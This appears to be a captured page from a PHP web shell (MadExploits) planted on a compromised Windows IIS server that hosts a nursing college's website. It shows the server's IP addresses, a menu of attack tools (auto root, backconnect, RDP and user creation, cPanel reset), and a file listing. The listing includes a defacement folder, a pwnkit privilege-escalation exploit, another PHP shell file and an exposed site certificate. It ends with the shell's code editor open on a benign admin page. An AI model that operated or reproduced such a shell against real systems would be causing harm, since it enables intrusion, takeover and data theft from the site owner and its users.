Windows NT WIN8053 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 10.10.28.53 | : 216.73.216.191
Cant Read [ /etc/named.conf ]
8.0.23
sahaiassociates-001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ H ]
h: /
root /
home /
sahaiassociates-001 /
www /
ppscollegeofnursing /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
Bin
[ DIR ]
drwxrwxrwx
calendar
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
hacked-by-overthrash1337
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
video
[ DIR ]
drwxrwxrwx
Achievement.aspx
2.92
KB
-rw-rw-rw-
Achievement.aspx.cs
2.62
KB
-rw-rw-rw-
Contact.aspx
4.27
KB
-rw-rw-rw-
Contact.aspx.cs
1.05
KB
-rw-rw-rw-
Default.aspx
14.31
KB
-rw-rw-rw-
Default.aspx.cs
5.47
KB
-rw-rw-rw-
EDefault.aspx
27.06
KB
-rw-rw-rw-
EDefault.aspx.vb
82
B
-rw-rw-rw-
MasterPage.master
32.02
KB
-rw-rw-rw-
MasterPage.master.cs
7.59
KB
-rw-rw-rw-
Pages.aspx
5.95
KB
-rw-rw-rw-
Pages.aspx.vb
79
B
-rw-rw-rw-
TOPPERS.aspx
2.04
KB
-rw-rw-rw-
TOPPERS.aspx.cs
2.18
KB
-rw-rw-rw-
comm.aspx
4.91
KB
-rw-rw-rw-
comm.aspx.cs
10.95
KB
-rw-rw-rw-
font-awesome.min.css
30.6
KB
-rw-rw-rw-
gallery.aspx
2.04
KB
-rw-rw-rw-
gallery.aspx.cs
2.16
KB
-rw-rw-rw-
google54c61c0b2d419343 (1).htm...
53
B
-rw-rw-rw-
google54c61c0b2d419343.html
53
B
-rw-rw-rw-
infrastructure.html
48.84
KB
-rw-rw-rw-
jquery.min.js
85.48
KB
-rw-rw-rw-
liz.php
62.03
KB
-rw-rw-rw-
mandatory-public-discloser.htm...
48.84
KB
-rw-rw-rw-
page.aspx
5.37
KB
-rw-rw-rw-
page.aspx.cs
5.34
KB
-rw-rw-rw-
ppscollegeofnursing.com.pfx
2.93
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
robots.txt
82
B
-rw-rw-rw-
sitemap.xml
2.24
KB
-rw-rw-rw-
skd-mobile-app.html
1.19
KB
-rw-rw-rw-
the-management.html
48.84
KB
-rw-rw-rw-
uploads.zip
60.53
MB
-rw-rw-rw-
web.config
646
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comm.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/admin/MasterPage.master" AutoEventWireup="true" CodeFile="comm.aspx.cs" Inherits="school1_comm" %> <asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"> <div class="content-wrapper"> <!-- Content Header (Page header) --> <!-- Main content --> <section class="content"> <div class="row"> <!-- left column --> <div class="col-md-12"> <!-- general form elements --> <div class="box box-primary"> <div class="box-header"> <h3 class="box-title">Add Community</h3> </div><!-- /.box-header --> <div class="box-body"> <div class="form-group col-md-8"> <label for="inputCity">SELECT SCHOOL</label> <asp:DropDownList ID="DropDownList2" CssClass="form-control" runat="server" AutoPostBack="true" onselectedindexchanged="DropDownList2_SelectedIndexChanged"> </asp:DropDownList> </div> <div class="form-group col-md-4"> <label for="inputCity">Name</label> <asp:TextBox ID="TextBox2" TextMode="MultiLine" runat="server" CssClass="form-control"></asp:TextBox> </div> <div class="form-group col-md-8"> <label for="inputCity">URL</label> <asp:TextBox ID="TextBox1" TextMode="MultiLine" runat="server" CssClass="form-control"></asp:TextBox> </div> <div class="form-group col-md-4"> <label for="inputCity">UPLOAD IMAGE</label> <asp:FileUpload ID="FileUpload1" runat="server" /> </div> <div class="form-group col-md-12"> <br /> <asp:Button ID="Button1" CssClass="btn-success" runat="server" Text="Save" onclick="Button1_Click" Visible="true" /> <asp:Button ID="Button2" runat="server" Text="Update" onclick="Button2_Click1" Visible="False" /> </div> <!-- To display the Size of image --> <asp:Label ID="Label1" runat="server" Text=""></asp:Label> <br /> <asp:Label ID="Label2" runat="server" Text=""></asp:Label> <br /> <!-- To display the Resize Image --> <asp:Image ID="Image1" runat="server" /> </div> <div class="box col-md-12"> <div class="box-inner"> <div class="box-header well" data-original-title=""> <h2><i class="glyphicon glyphicon-user"></i>Details</h2> <div class="box-icon"> <a href="#" class="btn btn-setting btn-round btn-default"><i class="glyphicon glyphicon-cog"></i></a> <a href="#" class="btn btn-minimize btn-round btn-default"><i class="glyphicon glyphicon-chevron-up"></i></a> <a href="#" class="btn btn-close btn-round btn-default"><i class="glyphicon glyphicon-remove"></i></a> </div> </div> <div class="box-content"> <table class="table table-striped table-bordered bootstrap-datatable datatable responsive"> <thead> <tr> <th>Name</th> <th>URL</th> <th>IMAGE</th> <th>Action</th> </tr> </thead> <tbody> <asp:Repeater ID="rpnews" runat="server" onitemcommand="rpnews_ItemCommand" onitemdatabound="rpnews_ItemDataBound" > <ItemTemplate> <tr> <td> <asp:Label ID="Label3" runat="server" Text='<%# Eval("name") %>' ></asp:Label> <asp:Label ID="lblid" runat="server" Text='<%# Eval("id") %>' Visible="false"></asp:Label> </td> <td> <asp:Label ID="Label4" runat="server" Text='<%# Eval("url") %>' ></asp:Label> </td> <td> <asp:Image ID="imgsite" runat="server" ImageUrl='<%# Eval("p1") %>' Height="50%" Width="50% " /> </td> <td class="center" > <asp:LinkButton ID="lnkdelete" runat="server" CssClass="btn btn-danger" CommandName="delete"><i class="glyphicon glyphicon-trash icon-white"></i>Delete</asp:LinkButton> <br /> <br /> <br /> <asp:LinkButton ID="edt" runat="server" CssClass="btn btn-danger" CommandName="Edit"><i class="glyphicon glyphicon-trash icon-white"></i>Edit</asp:LinkButton> </td> </tr> </ItemTemplate> </asp:Repeater> </tbody> </table> </div> </div> </div> </div> </section> </div> </asp:Content>
Close